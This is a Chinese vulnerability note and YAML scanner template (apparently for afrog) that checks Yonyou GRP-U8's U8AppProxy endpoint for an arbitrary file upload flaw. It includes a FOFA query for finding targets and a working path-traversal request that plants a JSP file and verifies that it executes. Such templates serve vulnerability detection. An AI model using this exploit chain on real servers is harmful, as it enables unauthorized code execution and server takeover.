漏洞描述
用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
fofa: title="用友GRP-U8行政事业内控管理软件"
id: yonyou-grp-u8-app-proxy-uploadfile
info:
name: 用友 GRP-U8 U8AppProxy 任意文件上传
author: zan8in
severity: critical
verified: true
description: |
用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
fofa: title="用友GRP-U8行政事业内控管理软件"
reference:
- https://mp.weixin.qq.com/s/vrfBOj62Wq54of4rcY-pIQ
set:
randstr: randomLowercase(5)
randbody: randomLowercase(28)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../{{randstr}}
headers:
Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
body: "\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\r\n\
Content-Type: image/png\r\n\
\r\n\
<% out.println(\"{{randbody}}\");%>\r\n\
--WebKitFormBoundary{{rboundary}}-\r\n\
"
expression: response.status == 500
r1:
request:
method: GET
path: /{{randstr}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()